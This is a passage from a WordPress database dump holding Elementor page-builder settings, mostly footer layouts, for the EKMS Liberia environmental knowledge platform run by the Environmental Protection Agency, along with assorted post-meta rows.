contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contribute\\/\\\">Join here!<\\/a><\\/span>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.92699999999999960209606797434389591217041015625},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.14699999999999846522769075818359851837158203125},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.19500000000000028421709430404007434844970703125,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/gef_logo.png\",\"id\":2838,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.1580000000000012505552149377763271331787109375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.67699999999999960209606797434389591217041015625},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.9700000000000006394884621840901672840118408203125,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":11.416000000000000369482222595252096652984619140625},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.1120000000000000994759830064140260219573974609375},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":44.13199999999999789679350215010344982147216796875,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":31.339999999999999857891452847979962825775146484375},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22Copyright%20%26copy%3B%20%22%2C%22after%22%3A%22%20%3Ca%20href%3D%5C%22https%3A%2F%2Fekmsliberia.info%2F%5C%22%20title%3D%5C%22Go%20Home!%5C%22%3EEKMS%3C%2Fa%3E.%20All%20Rights%20Reserved.%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30315,4232,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(30330,4234,'_elementor_edit_mode','builder'),(30331,4234,'_elementor_template_type','footer'),(30332,4234,'_elementor_version','3.4.1'),(30333,4234,'_elementor_pro_version','3.3.6'),(30334,4234,'_wp_page_template','default'),(30335,4234,'_elementor_data','[{\"id\":\"718abac\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_color\":\"#0A3C11\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4fdbdd5\"}],\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cf58eb9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5da1d9c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"32fa8e3\"}]},\"elements\":[{\"id\":\"25535b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":25.910000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"5e39944\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Subscribe To Our Newsletter\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"em\",\"size\":1.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1a532ac\",\"elType\":\"widget\",\"settings\":{\"text\":\"Sign up now\",\"size\":\"xs\",\"selected_icon\":{\"value\":\"far fa-check-square\",\"library\":\"fa-regular\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"900\",\"background_color\":\"#10CD2A00\",\"hover_color\":\"#0A3C11\",\"button_background_hover_color\":\"#FFFFFF\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"border_radius\":{\"unit\":\"px\",\"top\":\"4\",\"right\":\"4\",\"bottom\":\"4\",\"left\":\"4\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/newsletter\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"5a88643\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":24.9909999999999996589394868351519107818603515625,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"14\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4ebe3e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contribute to the EKMS\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6e044b0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication? <span style=\\\"color: #ffffff;\\\"><a style=\\\"color: #ffffff; text-decoration: underline;\\\" href=\\\"https:\\/\\/ekmsliberia.info\\/contribute\\/\\\">Join here!<\\/a><\\/span>\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"300\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"6387db7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.92699999999999960209606797434389591217041015625},\"elements\":[{\"id\":\"1653223\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This Site\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e621672\",\"elType\":\"widget\",\"settings\":{\"menu\":\"footer-menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"\",\"library\":\"\"},\"dropdown\":\"none\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_family\":\"Roboto\",\"menu_typography_font_weight\":\"400\",\"menu_typography_text_transform\":\"uppercase\",\"color_menu_item\":\"#FFFFFF\",\"color_menu_item_hover\":\"#FFFFFF\",\"menu_space_between\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"jet_family_widget_is_order_orientaion\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true},{\"id\":\"190105d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":21.14699999999999846522769075818359851837158203125},\"elements\":[{\"id\":\"5c7c794\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"500\",\"typography_text_transform\":\"uppercase\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"01d6428\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Address:<br>4th Street, Sinkor\",\"selected_icon\":{\"value\":\"far fa-address-book\",\"library\":\"fa-regular\"},\"_id\":\"933aa45\"},{\"text\":\"Email:<br>contact@ekmsliberia.info\",\"selected_icon\":{\"value\":\"far fa-envelope\",\"library\":\"fa-regular\"},\"_id\":\"52f7dde\",\"link\":{\"url\":\"mailto:contact@ekmsliberia.info\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"text\":\"Telephone:<br>+231775006254\",\"selected_icon\":{\"value\":\"fas fa-phone\",\"library\":\"fa-solid\"},\"_id\":\"5751132\"}],\"icon_color\":\"#FFFFFF\",\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_family\":\"Roboto\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"e2ebe37\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d116479\"}]},\"elements\":[{\"id\":\"a4a3928\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":5.19500000000000028421709430404007434844970703125,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"0ad9417\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/gef_logo.png\",\"id\":2838,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/www.thegef.org\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"d2ea495\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":71.1580000000000012505552149377763271331787109375,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"0cd4e1d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This website was created and maintained with the financial support of the Global Environment Facility (GEF). Its contents are the sole responsibility of Environmental Protection Agency (EPA) and do not necessarily reflect the views of the Global Environment Facility.\",\"align\":\"left\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"300\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cd2220c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":12.67699999999999960209606797434389591217041015625},\"elements\":[],\"isInner\":true},{\"id\":\"ec337e5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.9700000000000006394884621840901672840118408203125,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2788d71\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"1305dfd\"}]},\"elements\":[{\"id\":\"34e0d2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"451b973\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b174925\"}]},\"elements\":[{\"id\":\"26b130d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":8.8390000000000004121147867408581078052520751953125},\"elements\":[{\"id\":\"e50ba50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Follow us\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"800\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"b3a318e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":10.535000000000000142108547152020037174224853515625},\"elements\":[{\"id\":\"dc604f1\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"56bfa9d\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ekms.lib.7\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"9c51b4b\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/EkmsLiberia\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"75309ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/ekmsliberia\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#0A3C11\",\"icon_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true},{\"id\":\"40a5945\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":34.18500000000000227373675443232059478759765625,\"content_position\":\"center\"},\"elements\":[{\"id\":\"7ed1dce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"This is an Official Web Platform of the Liberian Government.\",\"align\":\"center\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"7948b50\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":46.441000000000002501110429875552654266357421875},\"elements\":[{\"id\":\"8cc0c42\",\"elType\":\"widget\",\"settings\":{\"align\":\"right\",\"text_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"typography_font_weight\":\"400\",\"__dynamic__\":{\"editor\":\"[elementor-tag id=\\\"3757d32\\\" name=\\\"current-date-time\\\" settings=\\\"%7B%22date_format%22%3A%22custom%22%2C%22custom_format%22%3A%22Y%22%2C%22before%22%3A%22%26copy%3B%20%22%2C%22after%22%3A%22%20%3Ca%20href%3D%5C%22https%3A%2F%2Fekmsliberia.info%2F%5C%22%20title%3D%5C%22Go%20Home!%5C%22%3EEKMS%3C%2Fa%3E.%20All%20Rights%20Reserved.%20%20Managed%20by%20the%20Environmental%20Protection%20Agency%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(30337,4234,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(30340,74,'_last_editor_used_jetpack','block-editor'),(30341,404,'_wp_old_date','2021-08-16'),(30342,127,'_wp_old_date','2021-08-16'),(30343,125,'_wp_old_date','2021-08-16'),(30344,117,'_wp_old_date','2021-08-16'),(30345,123,'_wp_old_date','2021-08-16'),(30346,120,'_wp_old_date','2021-08-16'),(30347,114,'_wp_old_date','2021-08-16'),(30348,118,'_wp_old_date','2021-08-16'),(30349,129,'_wp_old_date','2021-08-16'),(30350,115,'_wp_old_date','2021-08-16'),(30351,126,'_wp_old_date','2021-08-16'),(30352,1842,'_wp_old_date','2021-08-16'),(30353,124,'_wp_old_date','2021-08-16'),(30354,2509,'_wp_old_date','2021-08-16'),(30355,2596,'_wp_old_date','2021-08-18'),(30356,2746,'_wp_old_date','2021-08-16'),(30357,116,'_wp_old_date','2021-08-16'),(30359,4138,'_elementor_controls_usage','a:5:{s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:3:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:4:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;}}}}s:18:\"theme-post-content\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:13:\"section_style\";a:2:{s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:9:\"post-info\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:2:{s:4:\"view\";i:1;s:9:\"icon_list\";i:1;}}s:5:\"style\";a:2:{s:17:\"section_icon_list\";a:1:{s:13:\"space_between\";i:1;}s:18:\"section_text_style\";a:4:{s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:11:\"text_indent\";i:1;s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:2;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}s:14:\"section_layout\";a:1:{s:6:\"layout\";i:1;}}}}}'),(30361,4235,'_elementor_edit_mode','builder'),(30362,4235,'_elementor_template_type','wp-page'),(30363,4235,'_elementor_version','2.7.5'),(30364,4235,'_wp_page_template','default'),(30365,4235,'_elementor_data','[{\"id\":\"a61ba74\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"78ccf48\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9f48d08\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0334fdc\",\"elType\":\"widget\",\"settings\":{\"block_title\":\"Conventions & Protocols\",\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"1\",\"posts_rows\":\"5\",\"image_size\":\"full\",\"excerpt_length\":15,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Learn More\",\"show_meta\":\"\",\"meta_position\":\"after-excerpt\",\"show_date_icon\":\"fa fa-check-circle\",\"show_terms_tax\":\"resource_type\",\"post_type\":\"mea_resource\",\"all_btn_label\":\"All\",\"show_arrows\":\"yes\",\"arrow_type\":\"fa fa-angle-double-left\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"6d9f001\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"a6995f5\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"get_permalink\",\"date_format\":\"F j, 